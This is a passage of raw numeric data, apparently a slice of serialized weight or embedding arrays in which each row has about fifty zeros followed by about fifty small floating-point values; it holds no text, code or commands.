0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, -0.1288, 0.539, 0.0477, 0.3293, -0.1738, 0.4321, -0.8613, -0.1044, 0.0471, -1.2295, -1.096, -0.872, 0.0729, 0.02338, -0.896, 0.83, -0.4182, -0.462, 0.04376, 0.747, -0.01505, 0.1865, 0.9854, -0.1863, 0.1671, 0.1453, -0.0599, 0.714, 0.07446, 0.2383, -0.9976, -0.1731, 0.4053, -0.556, 1.371, 0.01912, -0.3083, 0.1578, 1.315, 0.3655, -6.195, 4.53e-05, -0.1608, -0.2676, 0.3928, -0.04657, 0.02441, 0.1925, 0.1483, -0.283], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.096, 1.062, 0.775, 0.05002, 0.2556, -0.4202, -0.6226, 0.4375, 0.034, 0.4045, 0.4429, 1.189, 0.598, 0.005684, 0.0525, 0.2402, -0.3247, 0.793, 0.02135, 0.1315, -0.0003395, -0.6963, -0.1387, 0.9844, -0.02068, 0.2068, -0.1578, -0.5444, 0.627, -0.2443, 0.1168, -0.2998, 0.913, 0.669, -0.6616, 0.03766, 0.04095, 0.03827, 0.689, 0.1687, 0.1874, 0.03204, 0.0003266, -0.3674, -0.7104, -0.02739, 0.01955, 0.7197, 0.06586, -0.01045], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.157, 1.28, 0.2167, -2.219, -1.404, -0.724, 0.2079, 0.4224, 0.04077, -1.311, -3.83, -4.684, -5.418, -0.04596, -0.02469, -0.1109, 0.0632, 0.876, -0.03041, 0.1691, 0.00954, 0.1411, 0.1555, -0.2893, -0.006958, 0.1511, 0.9355, -0.1599, 0.1777, 0.000599, -1.229, 0.2869, 0.6562, -1.096, -0.95, -0.02553, 0.58, 0.0421, 0.785, 0.1337, -0.4333, 0.0003924, 0.542, 0.1433, 0.9717, -0.0096, -0.02667, -4.336, -0.3052, -0.08734], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2448, -0.1965, 0.3975, -0.04852, -1.329, 0.145, 0.2399, 0.4246, 0.04932, -0.04538, 0.02022, 0.3542, -0.4197, -0.02858, -0.0905, 0.1057, -0.06696, -0.1974, 0.01266, -0.1991, -0.000937, -0.378, -0.1176, -0.07074, 0.0958, 0.4146, 0.219, -0.2952, -0.1573, -0.2223, -0.1385, -0.03662, 0.352, 0.2073, 0.8735, 0.04102, 0.157, -0.136, 0.1737, -0.548, -0.1113, -0.05072, 0.001236, -0.1367, -0.0703, -0.00259, 0.0399, 1.557, -0.1175, -0.04376], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04977, 0.04352, -0.03864, 0.0209, 0.0219, -0.02293, -0.01344, -0.0168, 0.0459, -0.0497, -0.04874, -0.007416, -0.02255, -0.01156, 0.02338, -0.004032, -0.003084, -0.02222, -0.01529, -0.0444, 0.0456, -0.0415, -0.03226, -0.04602, -0.03732, -0.022, -0.01868, -0.03345, -0.02733, 0.006138, 0.02785, -0.04538, -0.03638, -0.04178, 0.02573, -0.0447, 0.0421, 0.0397, -0.03464, 0.0367, 0.0186, -0.001802, 0.01161, -0.03708, -0.03946, -0.0261, 0.0371, 0.02608, 0.02322, -0.02492], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3474, -0.7314, 0.92, -0.5464, -0.1835, -0.2058, -1.047, 0.2448, -0.004555, -0.411, -0.3777, 0.0716, 1.229, 0.015205, 0.617, -0.3064, 0.1957, -0.3315, 0.03824, 0.1777, -0.03445, 0.484, 1.328, -0.1859, -0.02202, -0.731, 0.2805, -0.002882, -0.02455, -0.1737, -0.2408, -0.2465, -0.02423, -0.0893, 0.389, 0.02791, 0.59, 0.3457, 0.05563, -0.2437, -0.1321, 0.0248, 0.523, 0.2764, -0.276, 0.0394, 0.00958, -0.3513, 0.2051, 0.03345], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1028, -0.144, -0.02554, -0.0694, 0.5977, 0.0178, -0.457, -0.6934, 0.01686, -0.388, -0.03226, -0.2644, -0.1852, -0.02321, 0.2178, -0.5454, 0.2898, -0.9995, 0.0337, 0.2551, 0.002415, 0.3406, 0.6885, 0.0742, 0.003696, 0.4526, -0.002401, -0.2152, 0.2034, 0.4038, -0.1757, 0.049, -0.4683, 0.674, -2.021, 0.008224, 0.3206, -0.4692, 0.326, -0.3552, 0.6387, -0.00974, 0.3044, 0.3015, -0.737, 0.03262, 0.04004, -1.672, -0.218, -0.01746], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.165, -0.449, 0.03049, 0.2595, 0.0529, -0.1176, -0.806, 0.533, -0.04092, -0.4685, 0.3005, -0.415, 1.062, -0.0389, -0.1632, 0.2317, -0.0837, -0.0399, -0.00011945, 0.434, 0.02827, 1.043, 0.06058, 0.2832, -0.001966, 0.259, -0.2803, -0.434, -0.0852, 0.439, 0.1432, 0.2876, -0.2834, 0.462, -0.682, 0.00415, 0.644, 0.01552, 0.1973, 0.6494, -0.632, 0.001512, -0.3284, -0.1476, -0.03656, 0.00681, 0.03116, -1.149, -0.822, -0.664], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0421, 0.05084, 0.02278, 0.2426, -0.0988, 0.06964, -0.3792, -0.2979, 0.02068, -0.3206, -0.15, 0.2374, 0.01452, -0.02126, -0.0281, -0.215, 0.188, 0.477, -0.01023, 0.1138, -0.02972, -0.343, -0.286, -0.1288, 0.1431, -0.186, -0.0623, -0.294, 0.00924, -0.0624, -0.1674, -0.009964, 0.587, -0.2385, -0.4907, -0.006977, -0.2422, 0.1165, 0.3186, -0.083, -0.13, 0.02037, -0.11676, 0.09766, 0.264, 0.005276, 0.02467, 0.2644, -0.2603, -0.10516], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01491, 0.0232, -0.04218, 0.002293, 0.01924, 0.001015, -0.03702, -0.02106, -0.04926, 0.0277, -0.03525, 0.036, 0.01833, -0.02095, 0.01553, -0.04523, -0.001472, 0.00272, -0.0436, -0.05215, -0.00651, -0.0313, -0.02336, -0.05505, -0.0452, 0.002556, -0.049, 0.01201, -0.05524, -0.01221, 0.04037, -0.04907, 0.01884, -0.0416, 0.04758, 0.03275, 0.01727, -0.005226, 0.03336, 0.02444, 0.045, 0.02844, -0.01061, -0.01741, -0.04514, 0.006035, -0.04294, 0.01843, -0.03827, -0.02591], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.12, -0.24, 0.4822, 0.719, -0.2964, -0.3965, 0.03888, -0.0713, -0.02112, 0.0876, -0.01776, 0.1328, -0.0545, -0.0098, -0.3105, 0.593, -0.1864, 0.3289, 0.04153, -0.00979, 0.042, 0.1598, 0.2109, -0.01386, -0.0332, -0.03998, 0.5234, 0.1046, 0.1598, -0.05832, -0.2043, -0.1847, -0.0917, 0.2498, -1.152, 0.03873, -0.1466, -0.05646, -0.1975, -0.05014, 0.11884, 0.0408, -0.0928, 0.1818, -0.1234, 0.0004761, -0.03076, 0.3923, 0.2573, -0.05], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.11255, 0.01973, 0.7007, 0.1832, -0.6655, -0.64, -1.682, 1.527, 0.02623, -0.4355, -0.06113, 1.331, -0.622, -0.0177, 0.4148, -0.08905, -0.9316, -0.627, -0.0366, -0.45, 0.02573, 0.185, 0.1929, -0.0731, -0.041, -0.01065, 0.905, 0.1672, -0.0691, -1.143, -0.8047, 0.0573, 0.3274, 0.69, 0.05106, 0.003546, -0.185, -0.08154, -0.1375, -0.8945, 1.504, -0.01639, -0.004547, -0.627, 0.1558, -0.0497, -0.02864, -0.613, 0.7715, 
1.028], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01047, -0.5747, -0.3496, -0.1637, -0.3862, 0.2864, -0.5635, 0.7197, 0.03708, -0.3247, 0.0521, -0.01386, 0.461, -0.05472, -0.465, 0.1887, -0.2128, -0.653, -0.03946, 0.1941, -0.04672, 0.3862, 0.4648, -0.0784, -0.03476, 0.3547, -0.3552, 0.3406, -0.21, -0.00554, 0.3618, 0.693, -0.4084, -0.2666, -0.406, -0.006474, 0.278, 0.651, -0.435, -0.03543, 0.6743, -0.004814, 0.4666, -0.0953, 0.09106, 0.0345, 0.0543, -0.2141, -0.0002263, 0.5293], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1528, 0.337, 0.1443, -0.6016, -2.16, 1.153, -1.251, -1.802, 0.0471, 0.9155, -0.7593, -1.016, -0.517, 0.01158, 0.5576, 0.762, 1.495, -0.5176, 0.00543, 0.0694, -0.04794, -0.582, -0.5435, -0.2798, 0.0699, -0.911, -0.824, -0.2139, -0.08594, 0.313, -0.7197, 0.0438, -0.5884, -2.137, 0.3005, -0.00356, 0.0331, -0.4297, -0.4087, 0.3086, -0.5835, -0.03091, 0.705, 0.4998, -0.397, 0.01826, 0.01049, -0.1132, 0.5254, -0.927], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6646, 0.918, 0.3647, 1.063, 0.4446, 0.6465, -0.6465, 1.264, 0.00775, -1.746, -0.1991, 1.487, 0.3127, -0.02393, 1.098, 0.004314, -0.02902, 1.315, -0.0007625, 0.201, -0.00783, 0.4778, 1.271, -0.0945, 0.0955, 0.2888, -0.1991, 0.1175, -0.5356, -0.10504, 1.035, -0.1261, -0.495, 0.8696, -1.764, -0.04666, 0.794, -0.1245, 1.486, -0.677, -2.1, 0.00033, -0.0823, -0.2396, 0.9277, 0.03262, 
0.00639, 0.628, 0.591, 0.4648], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3716, 0.07294, -0.1508, 0.08624, -0.2588, 0.05685, -0.2019, 0.0749, -0.04, -0.01805, -0.06525, 0.1816, 0.1189, -0.009926, -0.01243, 0.1742, -0.1512, 0.4814, -0.02455, 0.1887, -0.01671, 0.4006, 0.04944, 0.5083, 0.00968, 0.1525, -0.1338, 0.5107, 0.6396, 0.0505, 0.119, -0.2505, 0.3423, -0.354, 1.091, 0.02193, 0.05872, 0.0625, 0.3677, -0.27, -0.4478, -0.03824, -0.4062, -0.002972, 0.4343, -0.02528, -0.02934, -0.5806, -0.11743, -0.03415], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09796, -0.10864, 0.1735, 0.02623, -0.672, 1.577, 0.164, -0.1346, 0.02968, -0.3174, -0.09705, -0.5835, 0.5713, -0.00473, -0.6284, 0.9883, 0.3765, -0.6567, -0.02678, 0.602, 0.02747, 1.181, 1.609, -0.10645, 0.03494, 1.126, -0.7266, 0.3472, -0.1451, 1.416, 0.1896, 0.2993, 0.00311, -0.4312, -0.9053, 0.02756, 0.3499, 0.1438, 0.000586, 0.919, -0.891, -0.03503, 0.02246, 0.707, -0.0768, -0.008995, -0.0435, -0.1514, -0.634, -0.596], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7925, -0.5312, -0.3555, 0.4905, 0.1498, -0.2522, -0.00675, 0.97, 0.02937, -0.9253, 0.321, 1.163, -0.254, 0.00212, -0.895, -0.298, -0.581, 0.1306, -0.02534, 0.05814, 0.003061, 0.675, -0.665, -0.4722, -0.01799, -0.765, -0.0797, 0.05475, 0.1417, 0.4182, 0.02975, 0.2325, -0.7344, 0.859, -2.344, 0.00394, 0.112, 0.327, -0.0936, 0.02501, -0.1508, 
-0.02237, -0.549, -0.495, 0.2817, 0.01018, -0.00066, 0.937, -0.2247, 0.4016], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.995, -0.48, -0.6055, -0.08545, -0.9277, 0.1137, -0.5166, -0.3926, 0.01811, -0.4727, -0.5234, -0.4927, 0.426, -0.05078, 0.4849, 0.5176, -0.004402, 0.1655, 0.02963, -0.307, -0.04428, -0.8086, -0.862, 0.2751, 0.012054, -0.2368, -0.539, 0.2805, 0.3208, -0.402, -0.353, -0.3306, 0.2996, 0.1172, 0.07434, 0.02347, -0.1978, 0.0994, 0.1476, -0.6484, 0.7837, 0.01067, -0.212, -0.1918, 0.0558, -0.01369, -0.01932, -0.8545, 0.6543, 0.03604], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9463, 0.663, 0.1235, -0.002598, 0.1838, -0.2485, 0.4067, 0.8467, -0.04565, -0.8057, 0.3364, 0.514, 1.137, 0.01403, 0.1781, -0.8574, -0.4194, 0.02582, -0.01573, 0.3723, 0.03787, -0.9966, 0.0866, -0.469, -0.01044, 0.2751, 0.0882, 0.2905, -0.07623, -0.4058, 1.205, 0.06525, 0.524, 0.5083, -3.469, -0.01993, 0.0516, 0.4412, -0.346, 0.03378, 0.48, -0.03552, -1.043, -0.4722, -0.5225, 0.00932, -0.05026, 1.328, 0.4282, 0.5835], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.45, 0.1406, -0.2783, -0.301, -0.5786, -0.05753, 0.05518, 0.003464, 0.03125, 0.2211, 0.0713, -0.408, -0.2174, 0.01889, -0.1799, -0.2703, 0.1334, 0.2247, -0.03943, -0.05716, 0.0181, 0.1406, 0.2607, 0.2223, 0.1017, 0.1984, 0.082, 0.09436, -0.4297, -0.1984, -0.4238, -0.0962, -0.03326, -0.06152, 0.5596, 
0.02144, 0.1558, -0.07135, 0.2042, 0.05362, -0.02017, -0.04895, 0.02922, -0.1365, 0.411, 0.02838, -0.0498, -0.772, -0.1804, -0.0889], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3123, -0.3914, 0.262, -0.006454, -0.2427, 0.082, 0.1592, 0.2854, -0.0175, -0.2734, -0.03174, 0.1368, 0.4216, 0.015144, -0.05652, -0.0695, -0.03775, -0.1482, -0.0434, 0.09204, 0.0197, 0.353, -0.07513, 0.06097, 0.137, -0.006615, -0.1096, 0.334, 0.3438, 0.03925, 0.3254, 0.06433, 0.6206, 0.07574, 0.609, 0.03094, 0.2291, 0.11816, 0.0858, -0.547, 0.1208, 0.002123, -0.237, -0.001655, 0.05948, 0.02515, 0.00469, -0.664, -0.0412, 0.1512], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0087, 0.01675, -0.0707, -0.0665, 0.01799, -0.02562, 0.006355, -0.0367, 0.03546, -0.03763, 0.005096, -0.04462, 0.01656, -0.007713, 0.04016, -0.01714, -0.06015, 0.03534, -0.0383, -0.01988, -0.01472, 0.03445, 0.03046, -0.04776, -0.04874, 0.02599, -0.03174, -0.06097, -0.00638, -0.02922, -0.012146, -0.02757, 0.02173, 0.03726, 0.01477, 0.03195, 0.01413, -0.0123, 0.005165, -0.03995, -0.0238, -0.02144, -0.02048, 0.0414, -0.03903, 0.001891, -0.02359, -0.03973, -0.0322, -0.0087], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7295, 0.1127, 0.676, -0.337, -0.2546, 0.06433, 0.502, -0.05383, 0.04062, -0.305, -0.4438, 0.5474, 0.05997, 0.02669, -0.0958, 0.1681, -0.11975, 0.6826, 0.01677, 0.1914, 0.0479, -0.4539, -0.3105, 
0.376, 0.09985, 0.06573, 0.06128, 0.06207, -0.3364, -0.0673, -0.1682, -0.00719, 0.1967, 0.04462, 0.988, 0.01477, 0.0702, -0.06006, -0.0628, -0.1633, 0.4307, 0.006424, -0.3867, 0.1196, -0.2957, 0.0171, 0.052, -0.8643, 0.4028, -0.077], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2474, 0.793, -0.1324, 0.1613, 1.14, -0.3296, 0.3538, -0.5894, 0.02426, 1.278, 0.00849, 0.4026, -0.4392, -0.01923, -0.9985, -0.4634, 0.07306, -0.2559, -0.009865, -0.1426, -0.0192, -0.6123, -1.384, 0.4448, -0.01729, -0.1646, 0.01509, -0.2291, 0.1676, -0.2262, -0.2708, -0.5073, -0.1646, 0.0969, -1.204, -0.0453, -0.3691, -0.549, 0.1992, 0.081, 0.8896, 0.02003, 1.008, -0.06964, -0.1272, -0.02708, -0.0346, 0.9478, -0.05524, -0.2102], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1808, -0.571, 0.4368, -0.8833, -0.3198, -0.4927, -0.9497, 0.03845, 0.01685, -0.8516, -0.211, -0.001687, -0.1682, -0.007298, -0.852, 0.2119, -0.3105, -0.1542, 0.00407, 0.3801, 0.007397, -0.91, -0.578, -0.0989, 0.02174, 0.48, 0.3684, -0.205, 0.4492, -0.004642, 0.2261, 0.5522, 0.2074, 0.8857, -0.9487, -0.04126, 0.11615, 0.06946, 0.3303, 0.2029, 0.2352, 0.04797, -0.2515, 0.09937, -0.4268, -0.02014, 0.02348, -0.8022, 0.2788, -0.1686], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.479, 1.287, -0.939, 0.2625, 1.606, -0.2207, 2.13, 1.363, -0.03293, 0.7144, 1.3955, 0.227, -0.3215, -0.04184, 2.934, 1.696, 0.7456, 
0.5273, 0.0361, 0.2263, -0.02483, 1.376, 0.7593, 0.1683, 0.11597, 1.18, -0.6533, 0.03253, -0.0497, -1.375, 0.577, -0.08325, -0.965, 1.265, 1.952, -0.04312, 1.166, -2.346, 0.5215, 1.69, -1.17, 0.0451, -0.3057, -0.1842, -0.2932, -0.0366, 0.02156, 1.562, -2.068, -0.9287], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3186, 0.405, -0.3447, 0.3442, -0.7017, 0.567, 0.04663, 0.2454, 0.0451, -0.8647, -0.3877, 0.7686, -0.5127, 0.01024, -0.00902, -0.6436, 0.4988, 0.03998, 0.006855, 0.281, -0.02815, 0.6514, 0.8813, -0.343, 0.003075, 0.3047, -0.4824, 0.0761, 0.984, 